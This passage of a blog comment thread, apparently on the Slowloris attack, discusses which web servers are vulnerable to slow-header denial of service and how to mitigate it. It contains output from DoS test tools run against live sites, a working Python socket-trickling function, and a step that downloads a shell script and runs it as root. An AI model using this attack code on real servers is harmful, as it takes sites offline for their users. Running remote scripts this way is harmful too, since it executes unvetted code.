    @RSnake, hypothetically, how would you hold a connectionless protocol’s connection open? DNS uses UDP/TCP; let’s say your requests are

  61. Ed Says:

    oops less than 512K

  62. RSnake Says:

    @Ed - I’d hold them open in the same way however that UDP service naturally held them open. UDP is stateless but that doesn’t mean whatever is supervising it has to be stateless. In the same way that HTTP is stateless - we’ve invented cookies that the browser and the server use between them to create state over a stateless protocol.

  63. Jay Says:

    Does anyone have the iptables rule to slow/stop this attack?

  64. Pablo Says:

    Hi there, I’m a member of Cherokee’s mailing list and I received a message from one of the Cherokee guys saying that he performed a DoS attack against a Cherokee server using this technique, and it passed the test!
    I can’t guarantee this but I trust the community.
    So, consider adding it to your list ;)
    For those who thought of giving Cherokee a chance… give it! I fell in love the first time I used it.

  65. Mike Adewole Says:

    The solution to this problem is actually what separates web sites from web applications in my opinion: request serialization.

    If a web server is designed to serve web sites, as Apache is, then the server will attempt to serve multiple requests simultaneously without serializing the requests in any way (e.g. by IP address).

    On the other hand, a web server that is designed to serve web applications (like the custom server running www.botslist.ca) should serialize the requests so that multiple requests from the same ip (and/or port depending on the environment) are served by the same thread. That thread will then use the http host header and session token to serve the request within the proper user context/state.

    In a web application server as described above, if the request queue for an IP address fills up, further requests from the same IP will be rejected with a timeout error, which will inform legitimate browsers (even if they are behind forward/reverse proxies) to retry the request. Other clients like your Slowloris will just get a whole bunch of timeout errors without blocking access to the web application for other clients.

    Apache falls for this hack simply because it does not serialize requests. So in a certain sense, it is indeed an architectural flaw in apache.
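    Mike’s per-IP serialization idea can be sketched roughly like this; this is a hypothetical illustration, not the code behind www.botslist.ca, and the cap of 8 is an arbitrary choice. The key point is that the accept path consults a per-IP counter before reading any request bytes, so a Slowloris-style client exhausts only its own quota.

```python
from collections import defaultdict

class PerIPLimiter:
    """Track in-flight connections per client IP; reject new ones
    once an IP's quota is full, before reading any request bytes."""
    def __init__(self, max_per_ip=8):
        self.max_per_ip = max_per_ip
        self.active = defaultdict(int)

    def try_accept(self, ip):
        if self.active[ip] >= self.max_per_ip:
            return False  # caller answers 503/timeout without reading headers
        self.active[ip] += 1
        return True

    def release(self, ip):
        """Call when the connection closes to free the IP's slot."""
        self.active[ip] -= 1

# A client trickling many slow connections hits its own cap; others proceed.
lim = PerIPLimiter(max_per_ip=2)
assert lim.try_accept("10.0.0.1")
assert lim.try_accept("10.0.0.1")
assert not lim.try_accept("10.0.0.1")  # third connection from attacker rejected
assert lim.try_accept("10.0.0.2")      # unrelated clients are unaffected
```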

  66. RLoxley Says:

    Can i use this to hack hotmail? woohhooo, haha

  67. Phil D Says:

    What about mod_limitipconn? Could you give it a test run?

    Apache 1.x: http://dominia.org/djao/limitipconn.html
    Apache 2.x: http://dominia.org/djao/limitipconn2.html

  68. adrianilarionciobanu Says:

    there has always been a tool (and some detailed description) here: http://pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html :) (with small compile-time errors explicitly coded in)
    anyway, i was more fed up with the anti-DDoS business morons who can (and usually will) kill your business faster than 1000 script kiddies working together.
    that was just an example of an attack that most anti-DDoS gurus won’t be able to stop any time soon.

  69. Wietse Wind Says:

    Here’s a quick and easy ‘fix’ using iptables, cron and netstat (and wget to install). This will probably run on just about any Linux webserver.

    sudo -i
    cd /tmp/
    wget http://hosting.servxs.net/files/install-antiloris.sh
    /bin/sh install-antiloris.sh

    Install script: http://hosting.servxs.net/files/install-antiloris.sh
    Antiloris script: http://hosting.servxs.net/files/antiloris.txt

    Good luck!

  70. B10m Says:

    RSnake, on the slowloris page you mention:

    “Requirements: This is a PERL program requiring the PERL interpreter”

    Please, please, please! Perl is not an acronym. So to be correct, it’d be “Requirements: This is a Perl program requiring perl (the Perl interpreter)”.


  71. Eghie Says:

    IPtables should block it, via hitcount, if the source is a single IP:

    iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
    iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 -j LOG
    iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 -j DROP
    iptables -A INPUT -p tcp --dport 80 -j ACCEPT

    If the source is a botnet with different IPs, this will not help.

    Throw a reverse proxy like Perlbal or Varnish in front of it. I don’t know if they are vulnerable themselves; that needs checking as well. But I guess they will let you handle more requests.

  72. Mike Adewole Says:

    @Phil D: mod_limitipconn won’t help much if Apache attempts to read the request headers before calling the module. And its check_limit function (yes, I read the code) will misbehave unless the content type is available.

    Also, I see no thread synchronization in this function, so the loop that calculates ip_count could have race issues in multithreaded versions of Apache.

    Anyway, in order to defeat Slowloris, serialization has to happen based on information from the tcp connection itself (e.g. the client ip address and/or port) without reading any part of the request beforehand.

  73. RSnake Says:

    @B10m - PERL is a holdover from how I originally learned it, as the “Practical Extraction and Report Language.” Yes, I was taught incorrectly that it actually was an acronym. I’ve been programming a very, very long time, and old habits are hard to break. But yes, you’re right. But seriously, who gives a crap?

  74. adrianilarionciobanu Says:

    there are no quick and easy fixes. not for apkill, at least. for slowloris, lots, since it’s single-sourced. slowloris’s “dos” mode is easy to filter even by just doing a per-IP connection limit with ipfw/ipt. apkill’s “ddos” mode… well… will just kill your apache, or any other tcp service if specially crafted for it. but any other type of ddos will kill you as well. the difference apkill makes is that it perfectly simulates a real visitor (well… tons of them). but it can be stopped 101% with a little bit of coding “on the bright side” and with very small chances of killing real visitors (it really depends on the speed of the attack)

    anyway, i still don’t get why this is regarded as a “bug” after all these years… even after thousands of years of being used as an exploit on humans: starvation. it’s not the technique that is different, but the target. all we do is apply these kinds of patterns that are deeply hidden in our perverted minds ;)

    what do i think this is?
    first, it’s pure marketing: the mere possibility of a threat catches you, the end user, in the web. remember, remember, remember. i brought up the cisco/microsoft dns case in the slashdot comments (how they decided this was the time-to-market for an old, already-fixed bug mentioned by djb years ago) but people are so focused on this “new exploit” that they go blind… you are not really being threatened by anything, at least not unless you actually become a victim, and unless you are doing dirty business you are unlikely to become one. you are just being paranoid.
    second is “la guerre pour reconnaissance” (the war for recognition), which isn’t as bad as it may sound; in fact this is what drives us to discover more b.s. (excuse my language)

  75. adrianilarionciobanu Says:

    Suricou(@Digg) made a nice timeline on the topic: http://digg.com/security/Apache_HTTP_DoS_tool_released

  76. RSnake Says:

    @adrianilarionciobanu - Cool, although I certainly didn’t rip off the code. This was the first I’d heard of it, and until Amit’s email I thought I was the first one to talk about it. Of course I now know that was an incorrect assumption, even though we did quite a bit of research and never found another DoS tool like it in the public domain. I’d love to see a copy of his code though. In a cursory check of a few search engines I didn’t see it lying about.

  77. adrianilarionciobanu Says:

    nono, you’re missing the point. i wasn’t sure why now, why not earlier, why never. until Suricou told me about anoctopus.c and the recent IFPI/Maqs attack (which, as far as i understand, was linked to the piratebay case). now, i did not personally check the anoctopus.c source code to see if they used the same technique, but if this is the case then my theory holds. the exploit has no value until a big victim arises (this case) or a big player decides it’s time, for some other well-thought-out reason… and that’s when the marketing comes to do the real hack. we’re just being played here. well, there’s at least one thing i am certain of: my paranoia is healthier than others’ ;)

  78. adrianilarionciobanu Says:

    if this is “the” anoctopus.c: http://ja.pastebin.ca/1439176 then it has nothing to do with the real technique: coded in a rush, and it doesn’t fully exploit the “capabilities” of an apache server ;) plus, from what i know, close() on a socket sends a FIN… this code was written by a gentleman :).

    everything related to apkill is public domain (at the url mentioned earlier somewhere above).
    if you want to test,
    0. make sure you have state-threads.sf.net , modify compile.sh and strun.sh to reflect the correct paths
    1. make sure you resolve perl deps before sucking links / generating the C header
    2. don’t get scared about the apfinger/chinese_death compile-time errors, they’re supposed to be there. chinese_death is supposed to die at runtime unless a one-line fix is applied.
    3. some of the info on running the killap target from the webpage is mistaken; one should read some of the source code to realize what’s going on. can’t just release a turnkey solution or i’ll get to smell toilets.

    just to test that a website is vulnerable, it’s enough to run ap_finger/chinese_death. the first digs out the timeout set up on the server side; the second tests whether the timeout is “properly” reset when sending a small random quantity of bytes to the server.

    output snips (i just made sure this thing still runs, because i haven’t touched it in more than 2 years):

    localhost d # ./ap_finger www.example.com 80
    resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
    wrote 3 bytes to net bufs, waiting on local buffers to flush ... buffers flushed to net!
    waiting on remote timeout ...
    error returned as expected, timeout=60 seconds, error_code=0, error_msg="Success"

    localhost d # ./chinese_death www.example.com 80 60
    resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
    sending 2 bytes to target, memcpy from addr 0
    timeout almost reached, write_to_net next 2 bytes SENT: "GE" at 1245533151
    sleeping 45 seconds before refreshing buffers...
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 2
    timeout almost reached, write_to_net next 2 bytes SENT: "T " at 1245533196
    sleeping 42 seconds before refreshing buffers...
    sleep_done, continue
    sending 4 bytes to target, memcpy from addr 4
    timeout almost reached, write_to_net next 4 bytes SENT: "//wh" at 1245533238

    conclusion: example.com is vulnerable

  79. rvdh Says:

    @Roland Dobbins

    I concur with your thoughts. Attacks on the TCP/IP stack are, in my opinion, something that gets shoved under the rug, since we all know (or reasonably assume) that it’s virtually impossible to stop a denial of service attack, due to the architecture and nature of how clients and servers operate. I understand Apache’s standpoint as well, since it’s really tough material and it’s easy to make very bad decisions when proposing “fixes”; it’s in the same league as cryptography as far as I’m concerned, because what you fix in one place you leave open in other places. I’m sure some would propose big buffers and whatnot, creating new problems on top of the issues at hand. That said, I’m more concerned about crashing a kernel with lingering connections by sending a perpetual FIN-WAIT-2, something inherently insecure about KeepAlive connections, and yet no one talks about that, because again, you won’t solve these kinds of attacks by fixing this as an individual case: across the states a TCP connection goes through, there are more theoretical attacks than I can roll my dice on. It’s like plugging holes in your boat with shotgun ammo.

    Interesting nonetheless, but at the end of the day a DoS can be accomplished on pretty much every box: with some luck, with minor resources; with less luck, you just resort to raw resources in the old-fashioned way.


  80. RSnake Says:

    Stevan Bajic helped me test and confirm that nginx in a default configuration is vulnerable as well. It required tuning the options slightly (-timeout 20 -num 3000), but the effect was actually worse than normal and kept the machine down far longer than the attack itself. It was still down minutes later.

    EDIT: never mind - this was due to the log directory having been full. False positive!

  81. adrianilarionciobanu Says:

    i don’t think it’s a false positive. nginx is a lady and promptly resets the timer on the next byte(s) received.
    i ran nginx with defaults a few minutes ago (./nginx -p ../ where ../ is the build root)

    localhost objs # HEAD http://localhost:80 | grep -E '^Server:'
    Server: nginx/0.8.3

    cia@localhost ~/dev/d $ ./ap_finger 80
    resolving timeout on connection to, this may take a while depending on remote server setup
    wrote 2 bytes to net bufs, waiting on local buffers to flush ... buffers flushed to net!
    waiting on remote timeout ...
    error returned as expected, timeout=60 seconds, error_code=0, error_msg="Success"

    cia@localhost ~/dev/d $ ./chinese_death localhost 80 60
    resolving timeout on connection to localhost:80, this may take a while depending on remote server setup
    sending 4 bytes to target, memcpy from addr 0
    timeout almost reached, write_to_net next 4 bytes SENT: "GET " at 1245610849
    sleeping 55 seconds before refreshing buffers...
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 4
    timeout almost reached, write_to_net next 2 bytes SENT: "//" at 1245610904
    sleeping 50 seconds before refreshing buffers...
    sleep_done, continue
    sending 2 bytes to target, memcpy from addr 6
    timeout almost reached, write_to_net next 2 bytes SENT: "im" at 1245610954

  82. adrianilarionciobanu Says:

    i got tricked as well by the client_header_timeout directive.
    it seems that indeed nginx does not reset the timer, but will kill the connection a few seconds later, on the next bytes received after the timer expired.
    setting client_header_timeout to 10 seconds allowed me to send a few bytes at a 12-second interval, but on the next send it went bananas. i’m not sure whether the tcp stack only told me later or the timer is only checked on the next receive, but i doubt the second case.

    i apologize for spamming with a false alarm

  83. adrianilarionciobanu Says:

    sorry, i got it. it’s the tcp stack that tries to resend (i had some bytes still queued in the kernel buffers, which shouldn’t happen unless the peer doesn’t care about me; nginx probably doesn’t care to announce a timeout immediately, which is nice) and the timer is respected properly. nice ;)

  84. adrianilarionciobanu Says:

    hoping that helps you, at least to confirm or question already made tests:

    nginx 0.8.3 - NOT vulnerable
    cherokee 0.99.17 - NOT vulnerable

    lighttpd 1.4.20 - vulnerable
    apache 2.2.11 - vulnerable

    i’m really sorry for the nginx false alert. i really liked it for correctly ignoring me. cherokee made a friendly tcp announcement that he’s gonna quit ;)

  85. adrianilarionciobanu Says:

    boa - vulnerable
    zeus - vulnerable (i was forced to test www.zeus.com. no harm done.)

  86. adrianilarionciobanu Says:

    sun web server - vulnerable (tested remote same as zeus)

    on the remote tests: not 100% sure. normally one only needs to guess the timers and then check whether they are being reset “properly”. if the timers seem to be reset, then normally my connection shouldn’t be killed too soon even in the case of big server load; i can assume starvation will happen. but i may be wrong.

  87. Nick Lowe Says:

    Please could you explain why you consider Squid to be vulnerable?

    I posted to their Bugzilla and got the following response:

    “Thank you for the info and pointer.

    I find it interesting that the article mentions Squid in the threaded web
    server section. They seem not to have all their facts lined up right.

    Squid does not use threads beyond the basic one every app has, and has long
    provided a number of mechanisms for protection against these types of attack.
    Parallel POSTs does seem to be a new approach to the old problem though.

    As they do mention “This also may not work if there is an upstream device that
    somehow limits/buffers/proxies HTTP requests” …such as Squid.

    If you are able to do any requests testing on current Squid we will be
    grateful. It is one of the areas lacking in test info presently.

    This issue can easily be avoided by reducing the request_timeout and
    read_timeout settings from minutes to a number of seconds. Also increasing the
    max_filedescriptors or ulimit. Operations which are routinely tuned by

  88. Nick Lowe Says:


  89. Daniel H. Says:

    Apache 2.2 patch which works:

    This patch is available at the following URL: http://synflood.at/tmp/anti-slowloris.diff.

    Tested against Apache 2.2.10 on a Gentoo system.

  90. JY Says:

    @Daniel H.
    The link you provided doesn’t work.

  91. adrianilarionciobanu Says:

    @JY: delete the ‘.’ at the end

  92. adrianilarionciobanu Says:

    @Nick Lowe:
    squid - NOT vulnerable
    i just tested it

  93. adrianilarionciobanu Says:

    anyway, i think testing http services is useless and will just piss people off. can’t really blame apache, for example, for being… politically correct, as i commented on

  94. adrianilarionciobanu Says:

    fingerprinting and vulnerability tests available for download (as they were done in 2007, output beautified a little and the compile-time errors dropped - useless now)


    the ddos tool, not cleaned up, is still available from the old url

  95. RSnake Says:

    @All - I will get to squid in a bit but I wanted to update regarding the MPM Event module: http://httpd.apache.org/docs/2.2/mod/event.html

    So we installed it (we already had worker installed, but not event). And it worked as advertised - sorta. Once we set Slowloris to -timeout 10 -num 7000, the test site went up and down frequently. So if you can get over the fact that it is “experimental, so it may or may not work as expected,” and the fact that “MPM is incompatible with mod_ssl, and other input filters,” and the fact that it’s still vulnerable but recovers occasionally… it’s a pretty good module for keeping your site up some of the time.

    IIS, on the other hand, still has no problems with that same Slowloris configuration. I still believe IIS has a better model than mpm_event_module.

  96. adrianilarionciobanu Says:

    event is for keepalives as far as i know, but you can still max out fdmax, or it would be easier if you run cgis. as for the worker mpm: the policy is the same as for prefork, isn’t it? re: timeouts, they’re reset the same way on the first byte received; you just have to reach maxthreads instead of maxprocs now.

  97. S. Says:

    FYI: I ran some Slowloris tests against some WAFs (based on Apache) and they failed too.
    Let the sun shine!

  98. RSnake Says:

    @All - Good writeup on stopping Slowloris with Cisco’s CSS:

    @S. - Which WAF broke? That’s interesting!

  99. hanabokuro Says:

    I think “AcceptFilter http httpready” will protect from slowloris if your OS is FreeBSD.
    Linux doesn’t support accf_http kernel module.

  100. S. Says:

    @rsnake: drop me an email to have explanation first

  101. Robert A Says:


  102. RSnake Says:

    @hanabokuro - yes, try the -httpready switch in Slowloris to get around accf_http (also known as HTTPReady).

  103. John Terrill Says:

    There has been far too much media coverage of this attack.

    We have known about this issue for a long time, which is why a number of load balancers and scalable infrastructures work the way they do. I mean, it’s textbook denial of service… Not to mention that commercial sites at high risk of these types of attacks have already implemented protections and monitor traffic well enough that they would just block connections fitting these traffic patterns.

    Another thing that seems to be exaggerated here is how impactful this attack is. It’s not like taking down a web server nets you much. Where is the access to trusted resources or the ability to run arbitrary code?

    Now there are outrageous accusations like Iran stating that CNN is trying to teach people how to take down its web servers (http://edition.cnn.com/2009/WORLD/meast/06/22/cnn.iran.claim/index.html). This could have been played very differently and explained more responsibly when explaining the actual risk.

    When discussing the media attention surrounding this DoS POC - to quote Family Guy, “this makes about as much sense as Beowulf having sex with Robert Fulton at the First Battle of Antietam”.

  104. hanabokuro Says:

    @rsnake - thanks for the info.
    hmm. accf_http only works with GET & HEAD.
    Why doesn’t accf_http support POST or other requests?

    I tested lighttpd. lighttpd is vulnerable.
    lighttpd has a max connection limit. It depends on FD_SETSIZE (the max number of file descriptors per process).
    lighttpd uses one fd for the connection to the client and one fd to read the HTML file.
    So lighttpd’s max connection limit is FD_SETSIZE (default 1024) / 2.

    ’slowloris.pl -num 600′ can DoS lighttpd.
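    The arithmetic in the comment above checks out; a quick sketch, assuming the common default FD_SETSIZE of 1024 that the comment cites:

```python
# lighttpd's per-process connection ceiling per the comment above:
# each connection costs two file descriptors (client socket + served file).
FD_SETSIZE = 1024
max_connections = FD_SETSIZE // 2
assert max_connections == 512
assert 600 > max_connections  # hence "slowloris.pl -num 600" is enough
```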

  105. hanabokuro Says:

    I tested lighttpd again.
    The “server.max-worker” config setting worked well.
    lighttpd can handle (FD_SETSIZE / 2) * “server.max-worker” connections.
    lighttpd is still vulnerable, but it becomes a little harder to DoS.
    An attacker needs more connections to pull off the DoS, which makes the attack easier to detect.

    I’ll change my server to lighttpd (reverse proxy mode) in front of Apache,
    with “server.max-worker = 256″ in lighttpd.conf and “MaxClients 256″.

  106. RSnake Says:

    @John Terrill - Surely you aren’t claiming that I am somehow to blame for Iran’s distaste for CNN’s coverage of a DDoS attack (not DoS) that pre-dates my release of the tool by nearly a week, right? That’s a bit of a stretch. And if it’s a textbook DoS attack, how is this tool any more of an issue than we had before? If you’re simply saying it shouldn’t have gotten news coverage, you and I are in agreement. Although I will disagree with your assessment that DoS gives you nothing; please read the two other blog posts on this site regarding DoS over the past month.

    I just want Apache to fix their problem. A problem that, as you rightly said, has been fixed by other inline devices and webservers for eons - but not by Apache. I wouldn’t have released Slowloris at all if Apache had given me more than a 20-word response indicating that they even cared, or had a reasonable fix forthcoming. I have a feeling the Apache guys are taking their disclosure cues from their Google brethren - it smacks of the same holier-than-thou entitlement BS, instead of a willingness to cooperate and work with the user community and admit that they have problems. Instead they’re happy enough to pass the blame onto the network for not compensating for their architectural issues, saying it’s old news and fixed by a module that doesn’t fix the problem (and breaks other stuff in the process). That’s a much easier fix than actually fixing it, isn’t it?

    Incidentally, if anyone can find a link to the original article that Iran is upset about, I’d be curious to read it.

  107. RSnake Says:

    @All - just got word of mod_antiloris http://hmnet.nl/mod_antiloris-0.1.zip We have not evaluated it yet, and may not have time to today. Comments welcome.

  108. adrianilarionciobanu Says:

    @John Terrill: I totally agree with you. If someone can start a war these days, the name is media. Anyway, the original article was meant to prove the exact opposite: that (some of) the companies that promise protection against dos/ddos are b.s.-ing their customers. And now… it is indeed an exaggeration for the sake of the effect, meant to hit the headlines. The worst thing is that only a few people see that…

  109. adrianilarionciobanu Says:

    So if someone (let’s say the dude who started it) can stop this circus, some people would be grateful. There’s no bug, there is no flaw. Understand that. It’s just a way to exploit friendly neighbours. Like in our daily lives.

  110. adrianilarionciobanu Says:

    … and @RSnake: if I would be an apache developer to take the decision on this then there would be no fix. Same for any other services marked as vulnerable. vulnerability does not always translate into a bug. If i am going to have my teeth spread all over the parking lot because of some incident with the gangs, for being too friendly and for not wearing a football helmet … well …

    my question is this: WHERE do you see a bug in Apache? It does it right. nginx doesn’t (for example, nor Cherokee, and that saved their butter), but these days the right thing is the wrong thing and the wrong thing is the right thing. Apache did enough by implementing accept filters. It’s true that accf_http will do more harm than good if DDoSed, and that it doesn’t support POST - but think of what POST is (in length) - and one can write another filter.
    I believe that if someone (like Apache) acts on this and “fixes” it, that will be a mistake.

  111. adrianilarionciobanu Says:

    mod_antiloris - definitely not fixing the problem. I read the source code.

    I must explain the problem:

    1. there is a Timeout setting that defines how long a connection should be kept open while waiting to receive the full request from the client
    2. if the Timeout is 30 seconds but I keep sending one byte just one second before the timer expires, the timer is reset. That allows me to keep the connection open indefinitely long.

    fixing the problem:

    1. don’t reset the timer; it should be kept the same until the full request is received, so let it run down. Keep a header_read_timeout and a post_read_timeout eventually (but I didn’t give it too much thought here)
    2. if a new connection should be accepted but there is no open slot, then the connection manager should close the oldest incomplete request to make room for the new one. CARE TO BE TAKEN with POST requests, where “the oldest” isn’t the best candidate if the POST data length is huge…. This should be OK TO IMPLEMENT because most HTTP request headers sent on most internet lines should FIT into one IP datagram.
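    Fix 1 could be sketched like this (a hypothetical Python illustration, not Apache code - the name read_request_headers and its parameter are made up): the deadline is computed once when the connection arrives and only shrinks, so a client trickling one byte at a time never buys itself more time.

```python
import socket
import time

def read_request_headers(conn, header_timeout=30.0):
    """Read HTTP request headers under an ABSOLUTE deadline.

    The deadline is fixed once, when the connection is handed to us,
    and is never pushed back when a byte trickles in -- resetting it
    on every byte is exactly what the attack exploits.
    """
    deadline = time.monotonic() + header_timeout
    buf = b""
    while b"\r\n\r\n" not in buf:  # headers end with a blank line
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise TimeoutError("header read deadline exceeded")
        conn.settimeout(remaining)  # shrinks each pass, never grows
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            raise TimeoutError("header read deadline exceeded")
        if not chunk:
            raise ConnectionError("client closed before full request")
        buf += chunk
    return buf
```

    With the usual reset-on-byte behaviour, the timeout would instead be re-armed to the full Timeout after every recv, which is exactly the window being described.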

    this is an ethical problem, and that is why I am saying Apache should do nothing. What if there are REAL slow clients, or congestion? It would not be fair to kill the weakest. That’s why a sysadmin should take the decision locally, either to do it or not.

  112. RSnake Says:

    @adrianilarionciobanu - The flaw is that they don’t use a worker pool model. Apache believes you should use resources even though the resources aren’t being used. IIS believes you should use resources only if they need to be used. A one-thread-per-user model isn’t acceptable. accf_http should be fixed, yes, but if it’s not a default install fix, then tons of things will continue to be DoSable. The alternative is that they fix it by using a similar worker pool model and make it default. Forget timeouts, that’s a hokey solution.

  113. adrianilarionciobanu Says:

    @RSnake :

    - what do you mean, forget timeouts? This is the core of the problem (if we all want to have a problem). Or is it just your personal war against apache-dev ignorance? What about lighttpd and the others? ;)
    - what do you mean, they don’t use a worker pool model? I always thought the “worker” and “prefork” MPMs are managed in pools; in fact many of the things in Apache are pools. They may lie in the documentation but not in the source code ;)
    - what do you mean by “a one-thread-per-user model isn’t acceptable”? Think CGI, and think embedded scripting in general: one blocking I/O operation or one CPU-intensive operation would hurt. They have the event module for static resources / keep-alive connections.

    what do you want, an Apache redesign against a DoS tool (that can eventually be reused for nice DDoSing)? Either way … let’s all get real.

    this is starting to look like something only Don Quixote may really fix.

  114. RSnake Says:

    @adrianilarionciobanu - You’re exactly right, CGIs that block have the same problems. Worker pools do not - where there is a pool of resources and only those who need those resources get them - a slow connection doesn’t need them until it starts communicating again. Apache does need a re-design or a default module that handles that same task for them. I don’t know enough about lighttpd or the others to tell how they should be fixed, but Apache blocks new processes from forking because it waits. By reducing the timeout you are only hurting legitimate users like you said.

    I don’t think reducing timeouts is the solution (which is why I said forget them). I think Apache’s one-thread-per-connection model is the problem - which is what Event MPM promised to fix but didn’t deliver, or at least not well.

  115. adrianilarionciobanu Says:

    I’M NOT SAYING to reduce the timeouts, I’m saying RESPECT THEM. I never said lowering the timeout is the solution; I said NOT TO RESET the timer when a byte feeds the connection, but to leave it installed as it was when the connection was initiated.

    CGIs and scripts in general are not Apache’s problem - those are the user’s problem.

    you want one single event-based thread to do the connection management and deliver only fully HTTP-established connections to the worker pool? Do that. I think the current design gives you the power to install your own module at any stage you want … many others have solved the problem the same way, or in a different way, outside Apache (which I consider safer). Apache wasn’t meant to be an HTTP fortress but a good framework on which others build their applications based on their needs. Really …

  116. RSnake Says:

    @adrianilarionciobanu - I understand and respect your opinion. I, however, don’t think it should be up to webmasters to have to write/install their own modules to do something that other webservers do automatically to protect you. But that’s just my opinion. In the same way I don’t think people should have to jump through a billion hoops to protect themselves online - the reason being they don’t know how most of the time and even if they do, they still don’t manage to do it completely right. Everyone would be better off if it just worked “correctly”.

    I agree about CGI scripts being the user’s problem because they wrote it. Just like Apache is Apache’s problem because they wrote it.

    Anyway, this is only a vaguely interesting conversation and outside of the scope of this thread. The real question is how to fix Apache, not how to install another inline device.

  117. adrianilarionciobanu Says:

    with your connection-manager-event-based-single-thread model, and without “fixing” the timeout reset, you will have the same problem. I will starve you of file descriptors to death: you will keep installing event listeners and eating one byte at Timeout-1 seconds on sockets until you are fully dead. lighttpd is event-based, isn’t it?
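    The byte-trickle being described can be sketched as follows (a hypothetical Python illustration, not a reproduction of killit; the name trickle and all its defaults are invented, and it should only ever be pointed at a server you own):

```python
import socket
import time

def trickle(host, port, nsock=200, timeout=30, rounds=3):
    """Open many sockets, send a partial request on each, then feed one
    more header line just before the server's read timeout would fire,
    resetting it every round. For testing your OWN server only.
    """
    socks = []
    for _ in range(nsock):
        s = socket.create_connection((host, port))
        # incomplete request: headers are never terminated by a blank line
        s.sendall(("GET / HTTP/1.1\r\nHost: %s\r\n" % host).encode())
        socks.append(s)
    for _ in range(rounds):
        time.sleep(max(timeout - 1, 0))   # wait until just before expiry
        for s in socks:
            s.sendall(b"X-a: b\r\n")      # nudge that re-arms the timer
    return socks
```

    Against a server with a reset-on-byte timeout, every socket here stays in the header-read state indefinitely, which is the fd starvation scenario above.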

  118. RSnake Says:

    @adrianilarionciobanu - possibly, you could be right. I can’t speak to lighttpd, but I haven’t yet been able to cause your scenario to occur on IIS. But maybe the attack will work differently in that model. I’d be curious to see some sample code that does what you’re describing.

  119. Mike Adewole Says:

    (This was meant to be posted here but I mistakenly posted it elsewhere :)

    Well, it is in fact an architectural problem in Apache with possible solutions described at http://www.codexon.com/posts/defending-against-the-new-dos-tool-slowloris.

    Now, whether Apache should fix it or not is their problem. But the solution is pretty simple: they need to (a) implement a per-client backlog request queue, similar to the backlog parameter that is passed to the listen socket API, and (b) read a client’s requests one at a time from that client’s backlog queue. When the queue fills up, requests from the same client or IP address are temporarily rejected.
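    Parts (a) and (b) could be sketched as bookkeeping that an accept loop consults (a hypothetical Python illustration; PerClientLimiter and its method names are invented, not actual Apache code):

```python
from collections import defaultdict

class PerClientLimiter:
    """Per-client backlog: at most `limit` connections in the
    header-read state per source IP; extras are rejected immediately."""

    def __init__(self, limit=8):
        self.limit = limit
        self.reading = defaultdict(int)  # ip -> connections still reading

    def try_accept(self, ip):
        """Called when a new connection arrives from `ip`."""
        if self.reading[ip] >= self.limit:
            return False                 # backlog full: temporarily reject
        self.reading[ip] += 1
        return True

    def done_reading(self, ip):
        """Called once the full request has been read from `ip`."""
        self.reading[ip] -= 1
        if self.reading[ip] <= 0:
            del self.reading[ip]         # drop idle clients from the table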

    Yes, this does mean that an attacker on say AOL can deny access to other AOL users but (1) that’s only possible if the attacker can busy-wait every ip address in the AOL proxy pool, and (2) should that happen, the problem will be AOL’s rather than Apache’s.

    For another reason why reverse proxy on AOL’s scale is AOL’s problem and no one else’s, see http://botsosphere.blogspot.com/2007/08/reverse-proxies-are-menace-to-web.html

  120. adrianilarionciobanu Says:

    im tired to publish the link of ddos tool. this is a vuln tester only. nobody pays attention, including you. it was my first post that i wrote the link to the tools (vul test + ddos tool).

  121. hanabokuro Says:

    I’v wrote a module.

    It based on mod_antiloris, mod_limitipconn and mod_extfilter.
    sorry, no document yet.

  122. Changlinn Says:

    I am surprised IIS isn’t vulnerable to this, IIS is threaded at least can be, the only thing I can think that may protect it is its tcp/ip connection limit.

  123. kai Says:

    WAF Phion Airlock will crash. The Backend Webservers feel fine :-)
    Tomorrow we’ll test F5 BIG IP

  124. adrianilarionciobanu Says:

    i updated http://pub.mud.ro/~cia/files/deadsnail/ to include a dos version of what was the ddos tool 2 years ago.
    so now you have 3 tools, one for fingerprinting, one for vulnerability check and one to dos yourself til blood comes out of your years. i removed all the ddos code for obvious reasons.
    you’ll have to read the page first if you want to reach the nirvana by running killit

  125. adrianilarionciobanu Says:

    to zombify lighttpd i ran a default lighttpd config with a timeout lowered to 60 seconds
    on the other side killit was called with
    ./killit localhost 80 60 4096. in this scenario altho i was able to connect with nc to lighttpd i didnt got served. i had no idea what the fd limit was.

    if lighttpd wouldnt be vulnerable to timeout-reset then this wouldnt happen. picture this in a ddos attack as a dos like this would be easy to make it go.

    i wouldnt go too much further with the apache-war hat you’re wearing now.

  126. adrianilarionciobanu Says:

    @RSnake: anyway, i understand what you want from apache. there were many that tried before to change something in better but everything was denied (i know at least two cases). and you will have no luck even if you would be 100% right and sustained by community and everything else. apache is one of the brontosaurs that survived. the same as bind. and bind sucks much more than apache and it is much more easy to exploit … but it works. it is backedup up by tons of clusters and load balancers and it works. other users use djbdns. they realized that they don’t need so many pairs of pink panties just because bind shites on it too often so they traded it for one pair of white panties. the same user can just drop apache and go nginx which seems to be a real candidate and i think the webmaster community should give it a stronger hand. or any other good candidate. cherokee maybe, i dont know. that if apache smells so brownish for them.

  127. nicola Says:

    @ Rsnake Best way isn’t improving apache , I’m absolutely agree with adrianilarionciobanu .
    If other webserver offers more , why not use instead of apache?
    There isn’t a bug , IMHO .
    However as always excellent work Robert :)

  128. nicola Says:

    IIS at the end isn’t vulnerable for connection limit , but can try by default .

    I think if you want to use apache you have to patch manually tot improve the security , and if you know how is a way , but if not can simple try other webserver more supported and ( as you said ) less old .
    Nobody forces to use apache . It’s very simple . I agree with you .
    Ah , thanks for tools sharing .

  129. Willy Says:

    I have put a config here to help Apache users protect their servers by simply moving apache to another port and installing haproxy in front of it. Haproxy doesn’t suffer from the apache model’s limitations and can easily sustain tens of thousands of concurrent connections, as well as enforce a timeout on the http request regardless of the server’s response time. Since a lot of people are downloading the config, I thought I should post it here too.


  130. Willy Says:

    Oh BTW, you can add haproxy to the non-vulnerable list (tested).

